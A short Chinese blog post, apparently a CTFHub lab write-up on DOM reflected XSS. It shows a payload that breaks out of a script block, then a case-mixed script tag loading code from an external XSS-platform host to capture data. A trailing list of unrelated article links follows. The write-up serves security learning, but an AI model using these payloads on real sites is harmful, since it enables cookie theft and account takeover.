CTFHub技能树web——XSS——DOM反射

A 八方2024-08-06 21:41

根据框里的内容 直接右键查看网页源代码 看到 了其闭合方式

然后去网页测试一下alert(1)反射

复制代码 
';</script><script>alert(1)</script>

看到 确实存在 去xssaq.cn

创建一个项目 把src粘过来 在第一个输入框中 再将返回回来的url 复制粘贴到第二个 输入框中

复制代码 
';</script><sCRiPt sRC=//xs.pe/Eoo></sCrIpT>
相关推荐
小小小小宇几秒前
前端双Token机制无感刷新
前端
小小小小宇3 分钟前
重提React闭包陷阱
前端
小小小小宇19 分钟前
前端XSS和CSRF以及CSP
前端
UFIT22 分钟前
NoSQL之redis哨兵
java·前端·算法
超级土豆粉29 分钟前
CSS3 的特性
前端·css·css3
星辰引路-Lefan30 分钟前
深入理解React Hooks的原理与实践
前端·javascript·react.js
wyn2000112841 分钟前
JavaWeb的一些基础技术
前端
Hygge-star1 小时前
Flask音频处理:构建高效的Web音频应用指南
前端·flask·音视频·pygame·csdn开发云
江城开朗的豌豆1 小时前
JavaScript篇:回调地狱退散!6年老前端教你写出优雅异步代码
前端·javascript·面试
飞鸟malred1 小时前
vite+tailwind封装组件库
前端·react.js·npm
热门推荐
01【图像处理与机器视觉】XJTU期末考点02KGG转MP3工具|非KGM文件|解密音频03YOLOv8入门 | 重要性能衡量指标、训练结果评价及分析及影响mAP的因素【发论文关注的指标】04海康Visionmaster-常见问题排查方法-启动阶段05从零安装 LLaMA-Factory 微调 Qwen 大模型成功及所有的坑06【SpeedAI科研小助手】2分钟极速解决知网维普重复率、AIGC率过高,一键全文降!文件格式不变,公式都保留的!07Coze扣子平台完整体验和实践(附国内和国际版对比)08DeepSeek各版本说明与优缺点分析09VMware虚拟机安装Win7专业版保姆级教程(附镜像包)10R-tree详解